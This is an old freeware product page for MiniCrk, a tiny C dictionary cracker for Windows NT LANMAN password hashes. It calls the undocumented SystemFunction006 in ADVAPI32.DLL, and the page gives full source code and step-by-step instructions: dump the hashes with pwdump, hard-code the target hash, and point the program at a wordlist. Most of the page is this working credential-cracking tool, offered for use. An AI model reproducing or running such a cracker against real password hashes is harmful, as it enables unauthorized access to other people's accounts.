Navigation: Mobiusware > Freeware > Products > MiniCrk
MiniCrk - Worlds smallest NT LANMAN dictionary cracker

Introduction There exist over thirty "undocumented" APIs in the Microsoft ADVAPI32.DLL. These function do everything from RC5 encryption to LANMAN (DES) and NT (MD4) password generation. If you do a dumpbin of the DLL you will see them listed as "SystemFunction###" where the #s represent the function number. Through some sleuthing of the interfaces we were able to document the SystemFunction006() interace as the one that generates the LANMAN passwords. We believe the function has the following prototype: 

WINBASEAPI WINAPI SystemFunction006(unsigned char in[14], unsigned char out[16]);

The sample code below for MiniCrk demostrates how to use this API to write a very simple dictionary cracker.
Implementation Notes This implementation is meant to be as simple (and short) as possible to demonstrate how easy it is to write a dictionary cracker for the LANMAN passwords stored by NT. It untilizes Microsoft's own internal DES enryption API for generating LANMAN passwords. This is not meant to be a fast (or flexible) implementation.

For instance, you must "hard code" in the encrypted password and dictionary name. It also doesn't implement common word permutations such as reversed words, word combinations, etc. If you want things like that, you can add them yourself, or try looking at the following implementations:

The example unknown password "552902031BEDE9EFAAD3B435B51404EE" used below is the encrypted form of the word "secret", probably one of the most common passwords of all time. If you want to see this program work, your dictionary file better contain that word.
Installation There is no special procedure to follow. Just place the program and its associated files in a directory on your computer and run it.
Screenshots There are no screenshots available at this time.
Future Enhancements None planned at present.
Known Bugs/ Restrictions No known bugs.
History Version 1.0.0.1 [December 14, 1998]
Intial version.
Instructions
  1. Modify array unknown[] to contain the encrypted LANMAN password. You can use the pwdump program available from http://src.doc.ic.ac.uk/packages/samba/pwdump/ to get this.
  2. Modify the fopen() to point to your dictionary file.
  3. Compile and link with the Microsoft NT DLL, advapi32.dll (should be automatic.)
  4. Run it. The plaintext password will be printed, if found.
Source   

#include <windows.h> /* for WINBASEAPI and WINAPI */
#include <stdio.h> /* for fopen(), fgets(), fclose(), and printf() */ 
#include <string.h> /* for memset(), _strupr(), strtok(), and memcmp() */

#define descrypt SystemFunction006 /* document the internal API */
WINBASEAPI WINAPI descrypt(unsigned char in[14], unsigned char out[16]);

void main(void) {
   unsigned char w[14+2], /* +2, fgets() returns a '\n' and '\0' */
   known[16], unknown[16] = { 0x55,0x29,0x02,0x03,0x1B,0xED,0xE9,0xEF,
                              0xAA,0xD3,0xB4,0x35,0xB5,0x14,0x04,0xEE };
   FILE *fp;

   if (NULL != (fp = fopen("comwords.txt","r"))) {
   while(!feof(fp)) {
      memset(w, 0, 14);               /* pad to 14 bytes with NULLs */
      /* remove '\n' added by fgets(), uppercase it, and encrypt it */
      descrypt(_strupr((strtok((fgets(w, 16, fp),w),"\n"),w)), known);
      if (0 == memcmp(known, unknown, 16)) { /* check it */
         printf("%s\n", w);        /* found it */
         break; /* from while */
      }
   } /* end while */
   fclose(fp);
   }
}
 

You can download the source and executable here.

Do you have updates? corrections? suggestions? E-mail us here.
All content © 2000-2002 Mobiusware